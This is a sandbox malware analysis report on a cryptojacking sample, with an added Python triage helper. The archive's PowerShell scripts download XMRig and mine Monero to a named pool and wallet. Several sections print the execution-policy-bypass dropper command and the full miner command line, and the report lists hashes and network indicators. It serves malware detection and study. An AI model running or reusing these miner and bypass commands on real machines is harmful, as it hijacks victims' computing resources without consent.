Malware Analysis Report

2024-11-16 12:09

Sample ID 240601-w5nxtabh58
Target main3.rar
SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Tags: xmrig, execution, miner
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral16, behavioral18, behavioral23, behavioral26, behavioral3, behavioral10, behavioral13, behavioral14, behavioral4, behavioral9, behavioral11, behavioral21, behavioral29, behavioral15, behavioral20, behavioral22, behavioral25, behavioral27, behavioral1, behavioral2, behavioral5, behavioral19, behavioral30, behavioral32, behavioral7, behavioral8, behavioral17, behavioral6, behavioral12, behavioral24, behavioral31, behavioral28 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10

SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88

Threat Level: Known bad

The file main3.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken (SeDebugPrivilege by powershell.exe; SeLockMemoryPrivilege by xmrig.exe, the "Lock pages in memory" right it needs for large-page allocation, not a privilege escalation)

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 18:30

Signatures

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win11-20240426-en

Max time kernel

1790s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
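The Processes and Network tables above contain the whole story of this sample: powershell.exe is started with -ExecutionPolicy bypass on a script in the user's Temp directory, the script fetches the xmrig 6.21.3 archive from GitHub (the github.com and objects.githubusercontent.com rows), and the extracted xmrig.exe connects to gulf.moneroocean.stream:10128 with a hard-coded wallet. The Python below is an added triage helper, not part of the sandbox report and not XMRig's own code: it re-derives the dropper, the pool and the wallet from command lines and network rows (the behavioral16 values are embedded as constructed sample input so it runs offline), checks that the -u argument has the shape of a Monero address, and separates pool traffic from the download. The -o/--url and -u/--user options are XMRig's real pool and user flags; the function names and the findings layout are this example's own.

```python
"""Triage helper for an XMRig dropper report (added example; not part of the
sandbox report and not XMRig's own code).

Re-derives from the report's own command lines and network rows:
  * the dropper: powershell.exe run with -ExecutionPolicy Bypass on a script
    under a user-writable %TEMP% path,
  * the miner: the xmrig -o <pool:port> -u <wallet> invocation, with a check
    that the wallet is a well-formed Monero address,
  * which network rows are mining traffic as opposed to the GitHub download.
Sample inputs below are constructed from the behavioral16 section so the
script runs offline; function names are this example's own.
"""
import json
import re

# Monero uses the Bitcoin base58 alphabet (no 0, O, I, l). A primary address is
# 95 characters starting with '4'; a subaddress is 95 characters starting with '8'.
MONERO_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
MONERO_ADDR_RE = re.compile(rf"^[48][{MONERO_B58}]{{94}}$")

# Constructed from the report's Processes section (behavioral16).
SAMPLE_PROCESSES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 '
    r'-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF',
]

# Constructed from the report's Network table (behavioral16): (country, destination, domain, proto).
SAMPLE_NETWORK = [
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "gulf.moneroocean.stream", "udp"),
    ("DE", "149.102.143.109:10128", "gulf.moneroocean.stream", "tcp"),
]

# -ExecutionPolicy Bypass followed (anywhere later) by -File <path>, path optionally quoted.
DROPPER_RE = re.compile(r'-ExecutionPolicy\s+bypass\b.*-File\s+"?([^"]+?)"?\s*$', re.I)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def is_monero_address(s: str) -> bool:
    """True if s has the shape of a Monero primary address or subaddress."""
    return MONERO_ADDR_RE.match(s) is not None


def parse_dropper_cmdline(cmd: str):
    """Return the script path when cmd is powershell.exe bypassing execution
    policy to run a script from %TEMP%, else None."""
    if not re.search(r"(?:^|\\)powershell\.exe\b", cmd, re.I):
        return None
    m = DROPPER_RE.search(cmd)
    if m and TEMP_DIR_RE.search(m.group(1)):
        return m.group(1)
    return None


def parse_miner_cmdline(cmd: str):
    """Return pool host/port and wallet for an xmrig-style command line
    (-o/--url and -u/--user are XMRig's pool and user options), else None."""
    pool = re.search(r"(?:^|\s)(?:-o|--url)[ =](\S+)", cmd)
    user = re.search(r"(?:^|\s)(?:-u|--user)[ =](\S+)", cmd)
    if not pool or not user:
        return None
    host_port = re.sub(r"^stratum\+(?:tcp|ssl)://", "", pool.group(1))
    host, _, port = host_port.rpartition(":")
    if not host or not port.isdigit():
        return None
    wallet = user.group(1).split(".")[0]  # drop an optional ".worker" suffix
    return {
        "pool_host": host,
        "pool_port": int(port),
        "wallet": wallet,
        "wallet_is_monero": is_monero_address(wallet),
    }


def classify_network(rows, miner):
    """Tag each row 'pool' (TCP to the miner's pool host:port), 'dns'
    (UDP/53 resolver traffic) or 'other' (here: the GitHub download)."""
    tagged = []
    for country, dest, domain, proto in rows:
        _, _, port = dest.rpartition(":")
        if miner and proto == "tcp" and domain == miner["pool_host"] and port == str(miner["pool_port"]):
            tag = "pool"
        elif proto == "udp" and port == "53":
            tag = "dns"
        else:
            tag = "other"
        tagged.append((tag, country, dest, domain, proto))
    return tagged


def triage(processes, network):
    """Combine the three checks into one findings dict."""
    findings = {"dropper": None, "miner": None, "pool_connections": []}
    for cmd in processes:
        findings["dropper"] = findings["dropper"] or parse_dropper_cmdline(cmd)
        findings["miner"] = findings["miner"] or parse_miner_cmdline(cmd)
    for tag, country, dest, domain, _ in classify_network(network, findings["miner"]):
        if tag == "pool":
            findings["pool_connections"].append((country, dest, domain))
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_PROCESSES, SAMPLE_NETWORK), indent=2))
```

Two points the output makes explicit. The only mining traffic in the table is the single TCP row to gulf.moneroocean.stream:10128; the GitHub rows are the download of a stock miner build and will look identical for any script that fetches an xmrig release, so they are weak indicators on their own. The wallet address is the indicator that survives across variants of this dropper (file names, script copies and pool hosts change; the payout address is what the operator cannot rotate without losing income), which is why the helper validates it rather than just pattern-matching the xmrig.exe path.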

Files

memory/2280-0-0x00007FFEBB1D3000-0x00007FFEBB1D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dqvjwge.a13.ps1 (benign: powershell.exe itself writes a __PSScriptPolicyTest_*.ps1 probe on startup to test AppLocker/WDAC script enforcement; it is not a file dropped by the sample)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2280-9-0x00000198B3E00000-0x00000198B3E22000-memory.dmp

memory/2280-10-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-11-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-12-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-14-0x00000198B3EA0000-0x00000198B3EB2000-memory.dmp

memory/2280-15-0x00000198B3E90000-0x00000198B3E9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4452-46-0x000001ACACAA0000-0x000001ACACAC0000-memory.dmp

memory/4452-47-0x000001ACACAF0000-0x000001ACACB10000-memory.dmp

memory/4452-48-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/2280-49-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-50-0x00007FFEBB1D3000-0x00007FFEBB1D5000-memory.dmp

memory/4452-52-0x000001ACACB30000-0x000001ACACB50000-memory.dmp

memory/4452-51-0x000001ACACB10000-0x000001ACACB30000-memory.dmp

memory/4452-53 through memory/4452-116 (64 consecutive dumps of the same region 0x00007FF6D0210000-0x00007FF6D0E43000)

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:42

Platform

win10-20240404-en

Max time kernel

1800s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/2900-2-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp

memory/2900-5-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2900-6-0x000002719C0D0000-0x000002719C0F2000-memory.dmp

memory/2900-9-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2900-10-0x000002719C290000-0x000002719C306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyyfydac.nof.ps1 (benign PowerShell script-policy probe, not a dropped file; the hashes below are those of the single character "1")

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2900-25-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2900-48-0x000002719C410000-0x000002719C422000-memory.dmp

memory/2900-61-0x000002719C160000-0x000002719C16A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2312-90-0x000001C7D9790000-0x000001C7D97B0000-memory.dmp

memory/2900-91-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp

memory/2900-92-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2312-93-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2900-94-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2312-95 through memory/2312-156 (62 consecutive dumps of the same region 0x00007FF610D70000-0x00007FF6119A3000)

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win10v2004-20240508-en

Max time kernel

1586s

Max time network

1595s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/1788-0-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp

memory/1788-6-0x000002D8FA020000-0x000002D8FA042000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suoxsbnw.ojt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1788-11-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-12-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-13-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-14-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-15-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-16-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp

memory/1788-17-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-18-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:46

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp

Files

memory/4496-3-0x00007FFBCC3E3000-0x00007FFBCC3E4000-memory.dmp

memory/4496-6-0x0000011EC5C10000-0x0000011EC5C32000-memory.dmp

memory/4496-5-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-10-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-9-0x0000011EC5ED0000-0x0000011EC5F46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybtlsrzt.cnc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4496-26-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-49-0x0000011EC5F50000-0x0000011EC5F62000-memory.dmp

memory/4496-62-0x0000011EC5CA0000-0x0000011EC5CAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1824-91-0x000002BE8F030000-0x000002BE8F050000-memory.dmp

memory/1824-92-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-93-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/4496-94-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-95-0x00007FFBCC3E3000-0x00007FFBCC3E4000-memory.dmp

memory/4496-96-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/1824-97 through memory/1824-157 (61 consecutive dumps of the same region 0x00007FF79F120000-0x00007FF79FD53000)

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:23

Platform

win10v2004-20240426-en

Max time kernel

1797s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 147.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp

Files

memory/1496-0-0x00007FFB22803000-0x00007FFB22805000-memory.dmp

memory/1496-1-0x0000019233510000-0x0000019233532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sytnh33q.akj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:35

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
